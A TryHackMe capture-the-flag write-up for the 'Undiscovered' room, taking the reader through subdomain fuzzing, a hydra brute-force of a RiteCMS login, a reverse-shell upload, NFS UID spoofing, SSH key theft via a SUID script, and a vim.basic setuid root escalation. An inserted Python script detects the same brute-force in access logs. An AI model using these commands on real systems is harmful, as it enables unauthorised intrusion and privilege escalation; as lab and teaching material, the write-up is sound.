
Undiscovered – TryHackMe

Write-up for Tryhackme room Undiscovered.

Difficulty Level – Medium

Start with an nmap scan as usual.

nmap -A -oN initial $IP

After that I tried a directory brute-force with gobuster, but no luck. Since we had to add the domain name to "/etc/hosts", it probably has something to do with subdomains.

Using "wfuzz" we can brute-force subdomains.

wfuzz -c -f sub-lists.txt -w /opt/SecLists-master/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://undiscovered.thm' -H "Host: FUZZ.undiscovered.thm" --hw 290

Now we need to add those subdomains to "/etc/hosts" to access them.

When we go to manager.undiscovered.thm we can see the CMS type and version. With those details we can search for available exploits in Exploit Database.

I found these two exploits.

  1. RiteCMS 2.2.1 – Remote Code Execution (Authenticated)
  2. RiteCMS 2.2.1 – Authenticated Remote Code Execution

According to Exploit Database, if we are able to access "http://website/CMS" we find a login panel, and with luck we can log in using the default credentials.

So to do that I wrote a bash script:

#!/bin/bash
# Probe each discovered subdomain for the CMS path and print the HTTP
# status next to the name instead of dumping every response body.
while read -r line; do
        curl -s -o /dev/null -w "%{http_code} $line\n" "http://$line.undiscovered.thm/cms"
done < sub-lists.txt

We found the correct URL, but unfortunately the default password does not work, so we need to brute-force it with hydra.

hydra -l admin -P /opt/rockyou.txt -f deliver.undiscovered.thm http-post-form "/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong"
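From the defender's side, the same attack leaves a very recognisable trace: a burst of POSTs to /cms/index.php from one client, every one of them answered with HTTP 200, because the CMS reports a failed login in the page body (the "User unknown or password wrong" string hydra matches on) rather than with a 4xx status. The following is an added example, not part of the write-up or of RiteCMS; it assumes Apache combined-format access logs, and the log lines it analyses are constructed samples.

```python
# Added defender-side example (not from the write-up): flag brute-force bursts
# against the RiteCMS login form by counting POSTs per client in a sliding window.
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one Apache combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"], "status": int(m["status"])}

def find_bruteforce(lines, path="/cms/index.php", threshold=10, window_s=60):
    """Return {ip: peak_count} for clients whose POSTs to `path` reach `threshold`
    inside any `window_s`-second sliding window.  Failed logins come back as
    HTTP 200 here, so request rate is counted rather than 4xx statuses."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged

def sample_log():
    """Constructed sample: 10.0.0.5 sends 12 POSTs in 22 s, 10.0.0.9 is an ordinary
    GET, and 10.0.0.7 sends 12 POSTs spaced one minute apart (legitimate retries)."""
    post = '{ip} - - [01/Jan/2021:10:{mm:02d}:{ss:02d} +0000] "POST {p} HTTP/1.1" 200 1532'
    lines = [post.format(ip="10.0.0.5", mm=0, ss=2 * i, p="/cms/index.php") for i in range(12)]
    lines.append('10.0.0.9 - - [01/Jan/2021:10:00:05 +0000] "GET /cms/index.php HTTP/1.1" 200 1532')
    lines += [post.format(ip="10.0.0.7", mm=i, ss=0, p="/cms/index.php") for i in range(12)]
    return lines

if __name__ == "__main__":
    print(find_bruteforce(sample_log()))   # {'10.0.0.5': 12}
```

Lowering the threshold to 2 also surfaces 10.0.0.7 with a peak of only 2 requests per window, which is why the threshold should be set well above a human's retry rate.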

We found the password. Now we can log in and find a way to upload a shell file and get a reverse shell.

Administration => File Manager => Upload file

Clicking the file executes it and we get the reverse shell.

Enumerating with linpeas.sh, we can see this detail.

If we create a william user on our own machine with the same UID, we can mount his home directory from the VM over NFS.

sudo adduser -u 3003 william

To mount the folder:

sudo mount -t nfs undiscovered.thm:/home/william/ /home/william/

First, make william's home folder accessible to everyone.

chmod 777 /home/william

The "script" binary is SUID. When we execute it, it reads "admin.sh"; analysing that script, we notice it accepts a parameter (a file to read). Since it belongs to leonard, we can try to read leonard's SSH key with it.

Now log in as user leonard.

ssh -i id_rsa leonard@$IP

Privilege Escalation

Run linpeas again to get more details as user leonard.

"vim.basic" looks suspicious, so I checked GTFOBins; with the suggested method we can escalate.

/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Finally Root!!

Hack the planet, spread the knowledge!!
